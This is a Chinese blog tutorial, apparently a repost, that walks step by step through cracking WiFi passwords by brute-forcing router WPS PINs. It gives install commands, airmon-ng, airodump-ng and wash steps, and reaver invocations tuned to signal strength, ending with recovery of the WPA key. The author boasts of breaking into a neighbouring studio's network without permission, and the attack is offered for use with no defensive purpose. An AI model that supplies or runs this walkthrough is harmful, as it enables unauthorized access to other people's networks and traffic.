使用reaver傻瓜式破解wifi之利用路由器WPS漏洞[通俗易懂]

使用reaver傻瓜式破解wifi之利用路由器WPS漏洞[通俗易懂]跟这篇破解教程一样,网上破解教程多是基于路由器的WPS漏洞破解,但是这样的路由器只占少数。一般wifi是依据WPA/WPA2加密的,因此想要破解一般的wifi,还得破解这个协议,虽然近期这个协议也被破解了,不过也是很不容易的。刚入门破解,不是很熟悉,在网上找各种破解资料,终于破解成功了临近工作室的wifi,沾沾自喜~本文破解wifi针对一些路由器的WPS(Wi-fipro…

大家好,又见面了,我是你们的朋友全栈君。

跟这篇破解教程一样,网上破解教程多是基于路由器的WPS漏洞破解,但是这样的路由器只占少数。一般wifi是依据WPA/WPA2加密的,因此想要破解一般的wifi,还得破解这个协议,虽然近期这个协议也被破解了,不过也是很不容易的。
刚入门破解,不是很熟悉,在网上找各种破解资料,终于破解成功了临近工作室的wifi,沾沾自喜~
本文破解wifi针对一些路由器的WPS(Wi-fi protected setup)漏洞,尝试很多次抓包PIN码,破解2-3天,正常来说是一定能抓到正确的PIN码的。
一个路由器对应唯一的MAC和PIN,而一旦得到MAC和PIN,通过reaver工具,路由密码等信息就可以很快得出来。
1.安装依赖包:
sudo apt-get install -y libpcap-dev
libsqlite3-dev sqlite3 libpcap0.8-dev libssl-dev build-essential iw tshark subversion
2.安装aircrack-ng:
svn co http://svn.aircrack-ng.org/trunk/ aircrack-ng
cd aircrack-ng/
make (aircrack-ng源码安装参考http://www.tuicool.com/articles/MfUjii)
sudo make install
3.安装reaver:
https://pan.baidu.com/s/1kUdvM1D下载reaver
tar zxvf reaver-1.4.tar.gz
cd reaver-1.4/src
./configure
make
sudo make install
4.如果安装成功后,会有airmon-ng,airodump-ng,reaver等命令可用(如果没有ethtool,要安装:apt-get install ethtool)
5.开始破解:(参考http://www.she.vc/article/18-108334-0.html http://www.kali.org.cn/thread-20995-1-1.html)
(1)sudo airmon-ng check kill (关闭进程,部分进程可能影响到后续的操作)

Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
  431 avahi-daemon
  446 dhcpcd
  470 avahi-daemon
  512 wpa_supplicant

(2)sudo airmon-ng
(3)sudo airmon-ng start wlan1
(4)sudo airmon-ng start wlan1mon (开启网卡,将网卡转换成混杂模式)

PHY Interface   Driver      Chipset

phy0    wlan0       brcmfmac_sdio   Broadcom 43430

Missing nexutil, cannot switch to monitor mode.
phy1    wlan1mon    mt7601u     Ralink Technology, Corp. 

(mac80211 monitor mode already enabled for [phy1]wlan1mon on [phy1]10)

(5)sudo airodump-ng wlan1mon (查看ap信号强度,破解的wifi信号越强越好)
(6)wash -i wlan1mon -C (查看支持wps的ap)(一种说法是:MB是54e.的可破解,54e不可破解)
6.(正式破解,在root下)使用reaver:
因状况调整参数:MAC即BSSID的值,-c后面的数字是CH的值。
目标信号非常好:
reaver -i wlan1mon -b MAC -a -S -vv -d0 -c 1
目标信号普通:
reaver -i wlan1mon -b MAC -a -S -vv -d2 -t 5 -c 1
目标信号一般:
reaver -i wlan1mon -b MAC -a -S -vv -d5 -c 1
7.每60s重新破解一次,等待三天,密码将会出来
8.最终得到PIN码(WPS PIN)和密码(WPA PSK),如果密码 被改,只要reaver加上-p命令
(reaver -i wlan1mon -b MAC -p PIN码 -vv),密码又能秒出; 但如果PIN码被改,就要重新破解了。
9.破解完成后,将网卡转回正常状态(airmon-ng stop wlan1mon)
破解过程

破解完成
备注:reaver时可以随时停止,它自己会保存进度
升级破解固件http://netsecurity.51cto.com/art/201105/264844_all.htm

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/139879.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

  • Windows server 2012 r2 系统安装启动u盘制作【系统镜像制作】——转自微信公众号网管爱好者

    Windows server 2012 r2 系统安装启动u盘制作【系统镜像制作】——转自微信公众号网管爱好者本文叙述U盘制作Windowsserver2012r2启动镜像的步骤

  • iostat命令详解参数_iostat命令的dm

    iostat命令详解参数_iostat命令的dmiostat命令详解iostat用于输出CPU和磁盘输入输出、分区、网络文件系统NFS相关的统计信息。iostat命令用于监控系统设备的输入/输出情况,并生成报告,以便根据统计报告修改系统配置,获取更优的性能。命令格式:iostat[-c][-d][-N][-n][-h][-k|-m][-t][-V][-x][-z][device

  • java的异或_java中的异或

    java的异或_java中的异或一、异或介绍异或是一种基于二进制的位运算,用符号XOR或者^表示,其运算法则是对运算符两侧数的每一个二进制位,同值取0,异值取1。性质1、交换律2、结合律(即(a^b)^c==a^(b^c))3、对于任何数x,都有x^x=0,x^0=x4、自反性AXORBXORB=AXOR0=A二、异或使用异或运算最常见于多项式除法,不过它最重要的性质还是自反性:A^B^B…

  • Django(72)Django认证系统库–djoser「建议收藏」

    Django(72)Django认证系统库–djoser「建议收藏」djoser是什么?作用:Django认证系统的REST实现。djoser库提供了一组DjangoRestFramework视图,用于处理注册、登录、注销、密码重置和帐户激活等基本操作。它适用于

  • JAVA之父—-James Gosling(詹姆斯·高斯林)

    JAVA之父—-James Gosling(詹姆斯·高斯林)JAVA之父詹姆斯·高斯林(JamesGosling)是一名软件专家,1955年5月19日出生于加拿大,Java编程语言的共同创始人之一,一般公认他为“Java之父”。(百度百科)有些人注定是要出名的,比如微软创始人比尔盖茨,有事没事你都能看到他,但也有一些人,做事不比盖茨差,却注定要泯然人海。如果不是学过Java恐怕没有几个人知道詹姆斯.高斯林大叔。如果没有Java人类就像不会说话的婴儿。人们”爱死了”盖茨,因为他给世界带来了看得见的操作系统;可是没有人会说“我爱死了高斯林”,尽管他所创

  • JMeter之事务控制器

    JMeter之事务控制器

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号